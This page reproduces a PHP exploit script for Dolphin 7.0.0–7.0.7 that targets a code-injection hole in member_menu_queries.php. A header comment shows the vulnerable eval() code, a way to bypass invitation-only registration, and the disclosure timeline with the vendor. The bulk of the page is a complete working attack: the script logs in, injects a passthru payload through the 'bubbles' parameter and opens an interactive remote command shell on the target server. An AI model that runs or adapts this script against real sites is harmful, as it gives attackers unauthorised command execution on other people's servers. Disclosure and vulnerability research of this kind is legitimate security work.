扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
<?php /* ---------------------------------------------------------------------------- Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection Exploit ---------------------------------------------------------------------------- author...............: EgiX mail.................: n0b0d13s[at]gmail[dot]com software link........: http://www.boonex.com/dolphin affected versions....: from 7.0.0 to 7.0.7 +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only.| | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] vulnerable code in /member_menu_queries.php 61.case 'get_bubbles_values' : 62.$sBubbles = ( isset($_GET['bubbles']) ) ?$_GET['bubbles'] : null; 63.if ( $sBubbles && $iMemberId ) { 64. 65.$aMemberInfo= getProfileInfo($iMemberId); 66.if($aMemberInfo['UserStatus'] != 'offline') { 67.// update the date of last navigate; 68.update_date_lastnav($iMemberId); 69.} 70. 71.$aBubbles = array(); 72.$aBubblesItems = explode(',', $sBubbles); 73. 74.if ( $aBubblesItems && is_array($aBubblesItems) ) { 75.$bClearCache = false; 76.foreach( $aBubblesItems as $sValue) 77.{ 78.$aItem = explode(':', $sValue); 79. 80.$sBubbleCode = null; 81.foreach($aMenuStructure as $sKey => $aItems) 82.{ 83.foreach($aItems as $iKey => $aSubItems) 84.{ 85.if( $aSubItems['Name'] == $aItem[0]) { 86.$sBubbleCode = $aSubItems['Bubble']; 87.break; 88.} 89.} 90. 91.if ($sBubbleCode) { 92.break; 93.} 94.} 95. 96.if ($sBubbleCode) { 97.$sCode= str_replace('{iOldCount}', $aItem[1], $sBubbleCode); 98.$sCode= str_replace('{ID}', $iMemberId, $sCode); 99. 100. eval($sCode); When handling 'get_bubbles_values' action, input passed through $_GET['bubbles'] isn't properly sanitized before being used in a call to eval() at line 100, this can be exploited to inject arbitrary PHP code. Successful exploitation of this vulnerability requires authentication, but is always possible to create a new account also if 'REGISTRATION BY INVITATION ONLY' is enabled, in this case an attacker could bypass the restriction visiting first /index.php?idFriend=1 and after point to /join.php for a new registration. [-] Disclosure timeline: [25/09/2011] - Vulnerability discovered [26/09/2011] - Issue reported to http://www.boonex.com/forums/topic/PHP-Code-Injection.htm [26/09/2011] - A moderator hide the topic [29/09/2011] - Vendor contacted again through http://www.boonex.com/help/contact [04/10/2011] - Vendor replied that there is a designated place for this kind of report: "Dolphin Bug Reports" forum [04/10/2011] - I replied that I've already posted in this forum, but the topic has been hidden [05/10/2011] - Vendor reply: "It may has been hidden because it WASN'T posted in the proper place" [05/10/2011] - My reply: "It has been hidden for security reason, the moderator told me to report the issue through http://www.boonex.com/help/contact" [08/10/2011] - Vendor replied that a patch will be released as soon as possible [13/10/2011] - Vendor update released: http://www.boonex.com/n/dolphin-7-0-8-beta-1 [18/10/2011] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "\n+------------------------------------------------------------+"; print "\n| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |"; print "\n+------------------------------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n"; print "\nExample....: php $argv[0] localhost / user pass"; print "\nExample....: php $argv[0] localhost /dolphin/ user pass\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "ID={$argv[3]}&Password={$argv[4]}"; $packet= "POST {$path}member.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) die("\n[-] Login failed!\n"); $phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])"; $packet= "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\ndolphin-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/\r\n\r\n(.*)\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> |
体验盒子
